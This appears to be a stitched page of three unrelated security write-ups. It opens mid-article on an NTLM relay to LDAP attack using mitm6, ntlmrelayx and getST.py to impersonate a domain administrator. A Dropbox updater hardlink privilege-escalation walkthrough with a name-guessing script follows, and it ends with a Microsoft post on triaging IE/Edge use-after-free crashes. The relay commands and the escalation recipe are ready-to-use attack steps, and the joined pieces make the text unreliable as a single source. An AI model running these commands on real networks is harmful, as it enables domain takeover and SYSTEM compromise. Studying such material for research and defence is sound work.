For the next part of the attack we’ll be using mitm6 + ntlmrelayx.  Unlike a traditional NTLM relay attack, really what we’re interested in is intercepting machine account hashes, as we can forward them to LDAP on a domain controller.  This allows us to impersonate the relayed computer account and set its msDS-AllowedToActOnBehalfOfOtherIdentity attribute to include the computer object that we control.  Note: We unfortunately can’t relay SMB to LDAP due to the NTLMSSP_NEGOTIATE_SIGN flag set on SMB traffic, so will be focusing on intercepting HTTP traffic, such as windows update requests. 
We’ll first set up ntlmrelayx to delegate access to the computer account we just made & have control of (rbcdTest): 

ntlmrelayx.py -wh WPAD_Host --delegate-access --escalate-user YOUR_COMPUTER_ACCOUNT\$ -t ldap://DOMAIN_CONTROLLER

We next start a relay attack using mitm6.py or other relay tool, and wait for requests to start coming in.  Eventually you should see something that looks like the following:

In the above screenshot we can see that we successfully relayed the incoming auth request made by the server02$ account to LDAP on the domain controller and modified the object’s privileges to give rbcdTest$ impersonation rights on the system.
Once we have delegation rights, the rest of the attack is fairly straightforward.  We’ll use another impacket tool – getST.py – to create the TGS necessary to connect to Server02 using an impersonated identity.
This tool will get us a Kerberos service ticket (TGS) that is valid for a selected service on the remote system we relayed to LDAP (Server02).  As the rbcdTest$ account has delegation rights on this system, we are able to impersonate any user that we want, in this case choosing to impersonate ‘administrator’, a domain admin on the testlab.local network.

getST.py -spn cifs/Server_You_Relayed_To_Get_RBCD_Rights_On -impersonate TARGET_ACCOUNT  DOMAIN/YOUR_CREATED_COMPUTER_ACCOUNT\$:PASSWORD

With the valid ticket saved to disk, all we need to do is export it to memory, which will then allow us to remotely connect to the remote system with administrative privileges:

From dropbox(updater) to NT AUTHORITY\SYSTEM

Original text by @decoder_it

Hardlinks again! Yes, there are plenty of opportunities to raise your privileges due to incorrect permission settings when combined with hardlinks in many software products (MS included).

In this post I’m going to show how to use the DropBoxUpdater  service in order to get SYSTEM privileges starting from a simple Windows user. I found and exploited this “vulnerability”  along with my usual “business partner” @padovah4ck.

Please note:  I’m not going to release any source code,  my goal is to share knowledge, not tools.

The DropBoxUpdater is part of the Dropbox Client Software suite, and according to the Software manufacturer, it is used for keeping the client up-to-date:


The updater is installed as a service and 2 scheduled tasks, and to be honest,  I really don’t know why… but let’s go on. Keep in mind that in standard installations they run as SYSTEM  and one of the dropboxupdate task is run every hour by the task scheduler.


Each time dropboxupdate is  triggered, it writes log files in this directory:

  • c:\ProgramData\Dropbox\Update\Log

Permissions are the following:


As you can see, users can add files to this directory.

Logfiles have a special format:


And the file naming convention is:
DropboxUpdate.log-<YYYY>-<MM>-<DD>-<HH>-<MM>-<SEC>-<MILLISEC>-<PID>

Users can overwrite and delete these files:


Even more interesting is a SetSecurity call made by SYSTEM on these files:


Seems familiar, doesn’t it? If you read my previous post, you already know that this is exploitable via hardlinks.

But we have a problem here: we have to “guess” the logfile name, that is, the exact time (including milliseconds) and the PID of the updater process.

Seems challenging!

After some testing we found this solution:

  • Be sure that no “DropBoxUpdate.exe” process is running (as a standard user:
    c:\>tasklist | find /I "dropboxupdate")
  • Intercept the DropBoxUpdate.exe process upon startup by setting an opportunistic
    exclusive lock on the following DLL:
    • C:\Program Files (x86)\Dropbox\Update\1.3.241.1\goopdate.dll
  • The process will hang and the user-defined callback function will be triggered
  • Find the PID of the dropboxupdate process
  • Perform a “hardlink spraying” by creating 999 links with the naming convention
    mentioned before, starting from the current time (hhmmss) + 10 seconds (timeA).
  • All these links point to the destination file we want to own. It is possible to set a
    maximum of 1024 hardlinks to a file.
  • Wait until the current time (hhmmss) is equal to timeA
  • Release the oplock
  • If everything works fine, we should match the correct file name in the range of 999 milliseconds.
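To illustrate only the “guessing” part of the steps above, here is a minimal sketch that computes timeA and enumerates the 999 candidate log names for a given PID. It creates no links and sets no oplock. The zero-padding of each field and the choice of milliseconds 000 to 998 are my assumptions, since the naming convention above does not spell them out; the function names and sample values are hypothetical.

```python
from datetime import datetime, timedelta


def target_time(now, delay_seconds=10):
    """timeA: the current time truncated to whole seconds, plus a delay."""
    return now.replace(microsecond=0) + timedelta(seconds=delay_seconds)


def candidate_log_names(start, pid, count=999):
    """One candidate name per millisecond value within the second 'start'.

    Assumption: fields are zero-padded (4-digit year, 2-digit date and time
    parts, 3-digit milliseconds); the PID is written without padding.
    """
    names = []
    for ms in range(count):
        names.append(
            "DropboxUpdate.log-%04d-%02d-%02d-%02d-%02d-%02d-%03d-%d"
            % (start.year, start.month, start.day,
               start.hour, start.minute, start.second, ms, pid)
        )
    return names


if __name__ == "__main__":
    time_a = target_time(datetime.now())
    names = candidate_log_names(time_a, pid=4242)  # hypothetical PID
    print(len(names), names[0], names[-1])
```

Keeping the count at 999 leaves headroom under the 1024-link limit mentioned above, since the target file already has at least one name of its own.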

Will it work? We just have to try it out, with the classic license.rtf located in the System32 folder. For testing purposes, you can directly invoke the scheduled task with admin rights instead of waiting for the next hourly run.


Wow! It worked. Now you could overwrite any file over which SYSTEM has full control... and gain the highest privileges!

But let’s go a step further… would it be possible to rely only on Dropbox Client software to gain a SYSTEM shell?

Yes, of course! Remember the second scheduled task?


The task runs with SYSTEM privileges and is also triggered at the logon of any user. During our test we noticed that during the logon,  the DropboxCrashHandler.exe was also invoked (only if no other dropboxupdate process is running in other sessions):


So what was our idea? Set DropboxCrashHandler.exe  as target file, launch the exploit, overwrite the file with our “malicious” executable, logoff, logon again and our executable should be triggered!

Here you can watch the working POC. I presume that there are other possible escalation paths; finding them is left up to you.

BOUNDARY CONDITIONS

  • Dropbox has to be installed in “standard” way, with admin rights
  • We tested it with the latest Windows Dropbox Client release (87.4.138 at the time of writing)

DISCLOSURE TIMELINE

We informed Dropbox about this issue on September 18th. They answered that they were aware of the issue (but not of these techniques and complete escalation paths) and would fix it before the end of October. Since 90 days have passed since the initial submission, I published the post.

POSSIBLE COUNTERMEASURES

While waiting for the new (hopefully patched) release, you could remove the “Create files / write data” and the “Create folders / append data” permissions for “Users” on the Log folder and you should be fine.

SIDE NOTE

Generic hardlink “abuse” will no longer work in future releases of Windows. In the latest “Insider” previews, MS has added some supplementary checks, so if you don’t have write access to the destination file you get an access denied error when you try to create a hardlink.

Triaging the exploitability of IE/EDGE crashes

Original text by swiat

Introduction

Both Internet Explorer (IE) and Edge have seen significant changes in order to help protect customers from security threats. This work has featured a number of mitigations that together have not only rendered classes of vulnerabilities not-exploitable, but also dramatically raised the cost for attackers to develop a working exploit.

Because of these changes, determining the exploitability of crashes has become increasingly complicated, as the effect of these mitigations must be taken into account during analysis. We have received a number of requests from the security community for clarification on how these mitigations affect exploitability.  To ensure that only valid issues are submitted, we thought it may be useful to offer some guidance.

 

Use after free mitigations

Use-after-free (UAF) is a common type of vulnerability in modern object-orientated software. They are caused when an instance of an object is freed while a pointer to the object is still kept by the program. Since the object instance has been freed, this pointer is dangling, pointing to unmapped memory. Such a vulnerability is exploitable when the unmapped memory is controllable by an attacker, and will be used when the dangling pointer is later dereferenced by the program. We can split UAF vulnerabilities into 3 classes based upon where the dangling pointer is stored: the stack, heap, and the registers.

We have developed two primary mitigations to protect against UAFs:

  • Memory Protector (MP) [IE10 and below]

MP is designed to protect objects against UAFs where the reference is stored on the stack, or in a register.

  • MemGC [Edge & IE11]

MemGC is a new replacement for MP, currently enabled on Edge and IE11. Protected objects are only freed when no references exist on the stack, heap or registers, offering complete coverage. 

 

Exploitability & Servicing

MemGC [Edge & IE11]

  • We consider UAFs that are addressed by MemGC strongly mitigated, and will not issue a security update for them.
  • The only exception for this are rare cases where zero writing the object leads to an exploitable state, although we have yet to see an occurrence of this.

Memory Protector [IE10 and below]

  • We consider stack and register based UAFs strongly mitigated and will not issue a security update for them, except in the circumstances explained below.
  • Heap reference based UAFs are not mitigated by MP, and so will still be addressed via a security update.

 

Triaging crashes

Memory protector

Memory protector (MP) is a mitigation first introduced in July 2014 initially for all supported versions of Internet Explorer, but now only applies to IE 10 and below. It is designed to mitigate a subset of use-after-free vulnerabilities, due to dangling pointers stored on the stack or the registers. At a high level, it works as follows:

  1. When delete is called on an object instance, its contents are zero-written, and it is placed in a queue. Once the queue has reached a threshold size, we then begin the process of seeing if it is safe to free each object instance in the queue.
  2. To test to see if it is safe to free an object instance, we scan both the registers and all pointer aligned stack entries to see if there exists a pointer to the object. If no pointer is found then the object is freed, otherwise the object is kept in the queue.

Part (1) of the algorithm delays the potential freeing of the object to a later point in time, is controllable by an attacker, and as such is not considered a security mitigation.

To make it easier to determine the exploitability of these issues, MP has a mode called “Stress Mode”. Under this mode the delayed free component (1) of MP is disabled: stack/register scanning happens on every free, rather than when the queue has reached a threshold length. It can be enabled with the registry key:

HKLM:/Software/Microsoft/Internet Explorer/Main/Feature Control/FEATURE_MEMPROTECT_MODE/iexplore.exe DWORD 2

(note that this key, and “Stress Mode” are only applicable to MP, not MemGC).
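The two-part algorithm and the effect of Stress Mode can be illustrated with a toy model. This is a sketch for intuition only, not the actual implementation: the class and field names are hypothetical, objects are plain dictionaries, the threshold is modeled as a number of queued objects, and the stack and registers are modeled as a flat list of integer values.

```python
class MemoryProtectorModel:
    """Toy model of delayed free plus stack/register scanning."""

    def __init__(self, threshold=4, stress_mode=False):
        self.threshold = threshold      # assumption: counted in queued objects
        self.stress_mode = stress_mode  # scan on every delete when True
        self.queue = []                 # deleted, zero-written, not yet freed
        self.freed = []                 # actually released to the heap

    def delete(self, obj, stack_and_registers):
        # Part (1): zero-write the contents and queue the object.
        obj["data"] = bytes(len(obj["data"]))
        self.queue.append(obj)
        if self.stress_mode or len(self.queue) >= self.threshold:
            self.reclaim(stack_and_registers)

    def reclaim(self, stack_and_registers):
        # Part (2): free only objects that no stack/register value points into.
        still_referenced = []
        for obj in self.queue:
            low = obj["base"]
            high = obj["base"] + len(obj["data"])
            if any(low <= word < high for word in stack_and_registers):
                still_referenced.append(obj)
            else:
                self.freed.append(obj)
        self.queue = still_referenced


if __name__ == "__main__":
    mp = MemoryProtectorModel(stress_mode=True)
    victim = {"base": 0x1000, "data": b"\xaa" * 0x30}
    mp.delete(victim, stack_and_registers=[0x1010])  # a pointer into the object
    print(len(mp.queue), len(mp.freed))
```

With stress_mode enabled, the queue threshold no longer hides whether an object would have been released, which is the property that makes triage easier.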

Example crash

With the delayed free component of MP now disabled by forcing the object instance to be freed at the earliest possible instant, we can now concentrate on determining exploitability, based on Part (2), as shown by an illustrative example below:

In this case, we have a use-after-free vulnerability causing a near-null dereference. Tracing backwards, we can see that the value of eax was set a few instructions previously:

If we look at this object in memory, we see that it has been zero-written, and by checking the PageHeap End Magic we can see that this heap chunk is still allocated under Stress Mode:

Now we need to see if there are any stack references to this object instance, starting at the call frame when delete was called. This can be completed using windbg scripting: for example, scanning for references to an object with base address stored in ebx with size 0x30:

Checking stack reference locations with MP

In this case, we find a single reference to the object instance on the stack. With this information we must now check to see which call frame contains this reference.

Here, we show an example call stack at the point when the object is deleted:

If there is a reference to an object instance on the stack or registers, then MP will never free the object instance. Thus, if between the point delete is first called in frame_2 until the point when we crash with a near null dereference in frame_5 there is always a stack reference, the object instance cannot be freed and reallocated/controlled by an attacker.

In this example, the reference we found by scanning the stack (at 0x1024ae9c) is stored in frame_8. Since this reference is present all of the time between the freeing point in frame_2 and the crashing point in frame_5, we consider this case as not-exploitable since it is strongly mitigated by MP.

Two other main situations can also occur:

  1. If (for example) the stack reference was in frame_3 rather than frame_8, then there is a period between the freeing of the object and the crashing point when there are no stack references. This case may be exploitable since if the code path between these points can be slightly altered to force another call to delete, we will be left with an exploitable situation.
  2. When running under stress mode, the crash may now occur on a freed block since the delayed free component is disabled (usually due to the reference being stored on the heap). Under this circumstance, the case would be generally exploitable.
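The frame reasoning above can be reduced to a simple comparison, sketched below. The sketch assumes frames are numbered as in the call stack captured at the point of delete (higher numbers are older callers), that the reference found in a frame stays in place for as long as that frame is live, and that the crash happens after control has returned to the crashing frame. The function name and the result strings are hypothetical.

```python
def triage_stack_reference(ref_frame, free_frame, crash_frame):
    """Classify a stack-based UAF from where the surviving reference lives.

    Frames below crash_frame have already returned by the time of the crash,
    so a reference stored in one of them no longer pins the object.
    """
    if free_frame > crash_frame:
        raise ValueError("expected the crash in the freeing frame or one of its callers")
    if ref_frame >= crash_frame:
        return "strongly mitigated"
    return "possibly exploitable"


if __name__ == "__main__":
    # The example from the text: delete in frame_2, crash in frame_5.
    print(triage_stack_reference(ref_frame=8, free_frame=2, crash_frame=5))
    print(triage_stack_reference(ref_frame=3, free_frame=2, crash_frame=5))
```

This covers only the stack-reference cases; a crash on an already freed block under Stress Mode, the second situation above, needs no frame analysis at all.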

MemGC

MemGC is a new replacement for MP, currently available in Edge and all supported versions of IE11, and mitigates use-after-free vulnerabilities in a similar fashion as MP. However, it also offers additional protection by scanning the heap for references to protected object types, as well as the stack and registers. MemGC will zero write upon free and will delay the actual free until garbage collection is triggered and no references to the freed object are found.

Just like MP, mitigated use-after-free vulnerabilities will most likely result in a near-null pointer dereference or occasionally in no crash at all. If you suspect that a near-null pointer dereference is actually a mitigated use-after-free vulnerability you can verify this with the following steps:

  • Find the position where the near-null value is read, determining the base pointer of the object:

If we dump the object, we can see that it has been zero-written as before:

  • Trace back and find the allocation call stack for this chunk, using the base pointer that was found in the first step. If the object is allocated with edgehtml!MemoryProtection::HeapAlloc() or edgehtml!MemoryProtection::HeapAllocClear() it means that the object is tracked by MemGC e.g.

Similarly, when the object is freed, it will be via edgehtml!MemoryProtection::HeapFree() e.g.

To double check that the issue is successfully mitigated, we can scan for references to the object on both the heap and stack.

For scanning the stack, we can use the same technique as described in the Memory Protector section. We can then use the same criteria as described above to determine exploitability; if there exists a stack reference between the freeing point and crashing point, we consider it strongly mitigated by MemGC.

When scanning the heap, we use a similar method, by first scanning the heap for references with values between the base pointer and basepointer+object_size of the object we are interested in. If any references are found, we then just need to check to see what objects they are associated with. If the object containing the reference is also tracked by MemGC (i.e. allocated via HeapAlloc() or HeapAllocClear()), then MemGC will not free the object we are interested in, so we consider it strongly mitigated by MemGC.
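The scan itself is the same for the stack and the heap: walk a memory region one pointer-aligned slot at a time and report every value that falls inside the object. Below is a minimal offline sketch of that check over a raw memory dump. It assumes little-endian pointers and treats the range as half-open (base included, base + size excluded); the function name and all addresses are hypothetical.

```python
import struct


def find_references(memory, region_start, obj_base, obj_size, pointer_size=4):
    """Return (address, value) pairs for pointer-aligned slots that point into
    the range [obj_base, obj_base + obj_size)."""
    fmt = "<I" if pointer_size == 4 else "<Q"
    usable = len(memory) - len(memory) % pointer_size
    hits = []
    for offset in range(0, usable, pointer_size):
        (value,) = struct.unpack_from(fmt, memory, offset)
        if obj_base <= value < obj_base + obj_size:
            hits.append((region_start + offset, value))
    return hits


if __name__ == "__main__":
    # Hypothetical 16-byte region containing one pointer into a 0x30-byte object.
    region = struct.pack("<4I", 0x41414141, 0x0A3C1010, 0x00000000, 0x0A3C1030)
    for address, value in find_references(region, 0x20000000, 0x0A3C1000, 0x30):
        print(hex(address), hex(value))
```

For each hit on the heap, the remaining question is the one described above: whether the object containing that slot is itself tracked by MemGC.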

In this example, if we use the stack scanning command from above, we see that there is a reference on the stack preventing the object from being freed between the deletion and crashing points, making it successfully mitigated by MemGC.

Conclusions

In conclusion these new mitigations dramatically enhance the security by making sets of use-after-free vulnerabilities non-exploitable. When triaging issues in both IE & Edge, the behavior of these mitigations needs to be taken into account in order to determine the exploitability of these issues.

Acknowledgments

We would like to thank the following people for their contribution to this post:

Chris Betz, Crispin Cowan, John Hazen, Gavin Thomas, Marek Zmyslowski, Matt Miller, Mechele Gruhn, Michael Plucinski, Nicolas Joly, Phil Cupp, Sermet Iskin, Shawn Richardson and Suha Can

Stephen Fleming & Richard van Eeden.  MSRC Engineering, Vulnerabilities & Mitigations Team.